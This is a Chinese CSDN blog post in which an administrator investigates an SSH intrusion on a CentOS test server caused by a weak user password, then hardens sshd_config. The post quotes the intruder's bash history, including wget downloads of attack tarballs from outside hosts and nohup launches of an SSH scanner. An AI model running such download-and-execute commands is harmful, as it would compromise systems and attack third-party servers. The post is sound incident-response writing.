Linux系统管理之 ssh 管理

最新推荐文章于 2024-08-07 16:29:29 发布
最新推荐文章于 2024-08-07 16:29:29 发布
阅读量1.6k 收藏
点赞数
分类专栏: Linux 系统管理 文章标签: ssh linux 服务器 网络 centos 工作
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/suvi/article/details/3279358
版权

 这是一个工作疏忽 -- 用户弱口令 造成失误。以此为戒。慎之又慎,网络安全容不得半点懈怠啊。

(原文链接 http://ddbiz.com/?p=227)

系统环境:

 

CentOS5.x (2.6.18-92.1.13.el5 #1 SMP)

 

今天偶然发现我的客户端使用 ToadMySQL 无法连接我的测试环境了。很是奇怪。报告的错误居然是在执行查询中服务器断开连接,从来没有发现过这种情况。ssh到服务器上,发现服务器响应很慢,一个 login 用了我差不多10秒。好像服务器出问题了。

首先检查了网络连接,系统中的网络连接出现大量的类似信息:

netstat -anlp | more

Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name
... ...

tcp        0     52 ::ffff:10.1.1.11:xxxx      ::ffff:202.219.1.5:22     ESTABLISHED  29487/pscan2
tcp        0      0 ::ffff:10.1.1.11:xxxx      ::ffff:218.10.12.51:22    ESTABLISHED  28801/pscan2
tcp        0      0 ::ffff:10.1.1.11:xxxx      ::ffff:219.68.111.47:22   ESTABLISHED  9201/pscan2
... ...

 

pscan2 ?我从来没有使用过,莫不是中木马了?

 

updatedb

locate pscan2

找到了,居然在 /dev/shm/xxx/xxx下。真中招了。/dev/shm/是我刚刚配置的为 php 的临时目录,主要是为了提升相应速度的。那么pscan2是如何传上来的?

 

/dev/shm/下我发现了上传上来的 一个 sc.tgz 文件,属性为

 

-rw-r--r-- 1 OfGdoc xxxx 2550904 Sep 30 04:19 sc.tgz

 

很显然,我的 OfGdoc 用户暴露在了外网。切换到 /home/OfGdoc 目录,查看一下脚本命令历史,果然不出所料:

more .bash_histor

 

w
ps x
cd
ls -a
locate vuln.txt
cd /tmp
ls -a
cat /proc/cpuinfo
passwd
cd /dev/shm
wget geocities.com/rootzfirehand/web.tgz
wget mafiotu.org/arhive/web.tgz
wget cipherz.icspace.net/web.tgz
wget coolfashion.trei.ro/web.tgz
wget coolfashion.trei.ro/sc.tgz
tar zxvf sc.tgz
cd delles
nohup ./start 220 >> /dev/null &
nohup ./start 200 >> /dev/null &
nohup ./start 203 >> /dev/null &

到此我才想起来,9月底因为公司的一个项目赶工,没办法,把测试服务器对外开放了一个晚上。看来当时就中招了。

因为ssh登路是有案底可查的,

 

who wtmp | uniq -w 20 -u | more

查看输出结果:

guest    pts/0        2008-09-27 01:09 (210.73.225.2)

...

Devjohn pts/1        2008-10-26 07:22 (acadb47b.ipt.aol.com)

...

OfGdoc pts/0        2008-11-09 02:52 (82.158.42.215.dyn.user.ono.com)

 

这3个登录都是成功的,查询这几个地址,显示如下:

 

IP:210.73.225.2
本站主数据:北京市 天广信息通信服务有限公司
参考数据一:北京市 天广信息通信服务有限公司
参考数据二:北京市 天广信息通信服务有限公司


acadb47b.ipt.aol.com

IP:172.173.180.123
本站主数据:美国
参考数据一:美国
参考数据二:美国

 

IP:215.42.158.82
本站主数据:美国 弗吉尼亚州国防部网络
参考数据一:美国 弗吉尼亚州国防部网络
参考数据二:美国 国防部网络(弗吉尼亚州)

网络上的黑客真是无所不在啊。

 

先做清除工作,为了保留这份不经意遗留的漏洞造成的困难,我把hacker的工作保留了下来,移到历史目录里,等有时间好好研究一下。

 

pkill pscan2

杀掉所有扫描进程。

 

 

妥善工作。

 

日后难免还有这种情况,测试服务器上毕竟有很多帐号,我还真是没办法时时强化管理。如果还需要对外开放端口的话,我应该限定指定的用户才能登录。那就需要配置一下 SSH 了

 

vi /etc/ssh/sshd_config

 

#注释掉这一行,禁止 root 登录

#PermitRootLogin yes

 

#加入这一行,仅仅允许指定的人登录

AllowUsers    Devjohn Devsam

 

保存后重启 sshd :

service sshd restart

 

现在暂时可以放些心了。

(原文链接 http://ddbiz.com/?p=227)

(未完待续)

 

suvi
关注
专栏目录
Linux安装与配置SSH服务
悦分享
07-24 2万+
白名单优先级高于黑名单,如果hosts.allow设置为允许133服务器登录,同时,hosts.deny为拒绝133服务器登录的时候,由于hosts.allow文件的优先级高,因此此时可以通过135服务器登录到本机。服务器端有3对非对称加密秘钥,当客户端连接服务端时,将ssh公钥发给客户端,要传输的数据经过公钥加密再进行传输,保证数据传输安全。注意:设置完成后,要退出ssh远程连接,再次登录后才可以生效。另外,特别提醒的是,设置好ssh的登录超时时间以后,记得退出重新登录或重启系统,以使配置生效。...
linux权限综合训练,linux综合练习(涉及管道,正则,重定向、用户及组管理、权限管理等相关知识点)...
weixin_42347763的博客
05-02 418
一、概述本博文是对前边总结的知识点的一个综合利用,涉及的知识点比较广泛,涉及的大概有"bash特性之管道","bash特性之重定向","grep命令与正则表达式的利用","linux下用户与组管理","linux下权限管理"等。下面给出上边提到知识点之前的博客链接:结合学习过的知识点,这题可以用who、cut、sort、uniq等命令结合管道来实现:who|cut -d' ' -f1|sort|u...
一次linux肉鸡***检测
weixin_34417814的博客
12-09 536
#本文还在继续修改完善中,想得到最新版请关注[url]http://baoz.net[/url] 和[url]http://xsec.org[/url]作者:baoz日期:2006-11-18[url]http://baoz.net[/url][url]http://xsec.org[/url]1妹儿:perlish(*)gmail.com or [email]fatb@zz...
linux综合练习(涉及管道,正则,重定向、用户及组管理、权限管理等相关知识点)...
u012271055的专栏
10-12 299
一、概述     本博文是对前边总结的知识点的一个综合利用,涉及的知识点比较广泛,涉及的大概有"bash特性之管道","bash特性之重定向","grep命令与正则表达式的利用","linux下用户与组管理","linux下权限管理"等。下面给出上边提到知识点之前的博客链接: bash的重定向和管道相关知识点:http://blog.51cto.com/9657273/2172717 文件基础管...
一次linux肉鸡入侵检测
最实用的Linux博客
02-07 3996
 原贴:http://www.hacker.com.cn/article/view_14673.html一次linux肉鸡入侵检测黑客发布日期:2008-9-20 0:10:36共有 953 人次浏览 put(appCommon.toUploadPic(,null,null,1,10,no));一次linux肉鸡入
Linux系统SSH远程管理服务
ZHUZIH6的博客
12-13 2414
SSH远程管理服务介绍,命令scp与sftp,实验免密登录详细过程与ssh-agent的使用
Linux系统中ssh远程管理服务
asdfg___xiaobai的博客
10-22 1830
公钥首次连接原理 客户端发起链接请求 服务端返回自己的公钥,以及一个会话ID(这一步客户端得到服务端公钥) 客户端生成密钥对 客户端用自己的公钥异或会话ID,计算出一个值Res,并用服务端的公钥加密 客户端发送加密后的值到服务端,服务端用私钥解密,得到Res
linux系统禁用ssh,怎么在Linux系统中禁用 SSH
weixin_29911569的博客
05-12 2961
今天微子网络与你分享了如何在Linux系统中禁用SSH,微子网络认为这很实用,所以他分享给你学习。希望你看完这篇文章能有所收获。话不多说,让我们和微子网络一起看看SSH是什么?Openssh叫做OpenBSD安全外壳。安全外壳(Secure Shell,ssh)是一种免费的开源网络工具,它使我们能够通过使用安全外壳(Secure Shell,SSH)协议在不安全的网络中安全地访问远程主机。采用...
新书推荐——Linux系统管理服务器配置
正月十六工作室
04-19 1万+
新书推荐——Linux系统管理服务器配置 近日,正月十六工作室组编的《Linux系统管理服务器配置》在电子工业出版社正式出版。图书基于工作过程系统化体例编写,围绕Linux服务管理核心技能要求,引入行业标准、职业岗位标准和企业应用需求,通过真实企业网络工程项目案例,按网络工程业务实施流程展开项目实战,在实践中精进Linux管理核心能力,助力初学者快速掌握Linux系统管理与服务配置。 教材主要内容 教材围绕Linux系统运维工程师岗位对Linux服务部署项目实施与管理核心技术技能的要求,基于工作过程系
如何在 Linux 系统上更改 SSH 服务端口以增强服务器安全性
最新发布
分享关于Java编程、数据库管理和信息安全方面的最佳实践
08-07 1363
通过更改默认的 SSH 端口,您可以增加服务器的安全性并减少潜在的攻击风险。虽然这并不是一个完全的安全解决方案,但它可以有效地降低被扫描和攻击的可能性。记得在更改端口后,更新所有相关配置和规则以确保服务的正常运行。
Python基于SSH协议实现Linux系统远程管理方法研究.pdf
06-29
总结而言,Python结合SSH协议在远程管理Linux系统方面展现出其强大的功能和灵活性,能够高效完成日常的运维任务,提高系统管理的便捷性和安全性,对于IT运维领域具有重要的实用价值。随着技术的发展和Python语言的日...
Linux系统管理工具包使用SSH进行分布式管理.pdf
09-13
Linux系统管理工具包使用SSH进行分布式管理》一书深入探讨了如何利用SSH在分布式环境中高效管理Linux系统。SSH,全称为Secure Shell,是一种网络协议,用于在不安全的网络上安全地远程执行命令和传输数据。在Linux...
Linux系统管理工具包使用SSH进行分布式管理.docx
09-13
Linux系统管理工具包使用SSH进行分布式管理】 在IT领域,特别是系统管理中,Linux操作系统因其开源、稳定和高效的特点而被广泛采用。在管理多个Linux服务器时,SSH(Secure SHell)是一种不可或缺的工具,它允许...
基于Linux操作系统的SSH.rar
07-25
2. **启动和管理SSH服务**:安装完成后,可以通过`systemctl`命令管理SSH服务。`sudo systemctl start sshd`启动服务,`sudo systemctl enable sshd`设置开机启动,`sudo systemctl status sshd`检查服务状态。 3. ...
nginx 优化系列之worker_connections
热门推荐
钱可通神
07-09 1万+
nginx.conf   (原文链接 http://ddbiz.com/?p=153) events {         use epoll;         worker_connections  8192; } 增加 worker_connections,测试配置报告:       [warn]: 8192 worker_connections are more than
hostname: Unknown host
钱可通神
01-06 4862
今天要维护邮件服务器:修改些不相干的配置,比如增加log文件的大小,增加log文件的数量,然后重启邮件服务时,发生了 (原文链接 http://ddbiz.com/?p=134) hostname: Unknown host   真是很奇怪的事情,log文件的修改是不会改动到任何网络这方面的设定的。   回到 shell 下,执行   #hostname Unknown host
LAMP 优化 之三 php Allowed memory size of xxx bytes exhausted
钱可通神
11-10 4775
接前篇 LAMP 优化之二 数据库优化Mysql (原文链接 http://ddbiz.com/?p=228)   最近的页面好像越写越大,一个index.页面居然都会产生这种错误:   [Mon Nov 10 10:49:09 2008] [error] [client 127.0.0.1] PHP Fatal error:  Allowed memory size of 167
X8DTL-6 安装 CentOS 5, SAS2008-IR 驱动安装方法
钱可通神
06-11 3526
Supermicro X8DTL-6的主板使用的是 LSI SAS2008-IR 的 sas raid控制器。 (原文链接 http://ddbiz.com/?p=158) 很不幸的是,supermicro提供的驱动程序 RHEL_5.img 不支持 CentOS5! 使用dmesg会发现:   ksign: module signed with unknown public key
Linux系统管理SSH与VNC详解
SSHLinux系统管理中扮演着关键角色,允许安全地远程访问和控制其他系统。此外,还涉及到了SSH客户端,如putty和f-ssh的使用。 在Linux系统的基础部分,首先介绍了Linux/UNIX系统的概述,强调了其开源、多用户、多...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值